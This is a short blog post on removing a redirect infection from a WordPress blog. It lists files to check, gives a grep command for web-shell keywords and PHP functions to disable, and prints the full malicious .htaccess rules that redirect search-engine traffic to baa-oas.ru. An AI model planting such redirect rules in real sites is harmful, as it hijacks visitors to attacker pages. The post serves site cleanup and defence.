Remove redirect virus from wordpress blog

If your weblog attacked by .htaccess virus/malware and your traffic from search engine redirected into this website baa-oas.ru or googlesgo.com then you must check this file

1. .htaccess
2. wp-settings.php
3. update.php this file location at wp-admin/includes/update.php
4. Check all php files which contain this word "base64", "c99", "r57","shell_exec" Do it from shell acces and type this command: find [path] -name *.php -exec grep -l "base64" {} \;
5. Disable this php functions: exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
6. Change your password.

Malware code:
<IfModule mod_rewrite.c> <br /> RewriteEngine On<br /> RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) <br /> RewriteRule ^(.*)$ http://baa-oas.ru/space?7 [R=301,L] <br /> RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) <br /> RewriteRule ^(.*)$ http://baa-oas.ru/space?7 [R=301,L] <br /> </IfModule> <br /> # BEGIN WordPress<br /> <IfModule mod_rewrite.c><br /> RewriteEngine On<br /> RewriteBase /<br /> RewriteRule ^index\.php$ - [L]<br /> RewriteCond %{REQUEST_FILENAME} !-f<br /> RewriteCond %{REQUEST_FILENAME} !-d<br /> RewriteRule . /index.php [L]<br /> </IfModule><br /> <br /> # END WordPress<br /> <br /> ErrorDocument 400 http://baa-oas.ru/space?7 <br /> ErrorDocument 401 http://baa-oas.ru/space?7<br /> ErrorDocument 400 http://baa-oas.ru/space?7 <br /> ErrorDocument 401 http://baa-oas.ru/space?7<br />

If you have a lot of websites infected with this malware and want me to clean it up please contact me via email: noc [@] nsa.im. [not free, give me a cup of coffee]
more code about google redirect virus can be found here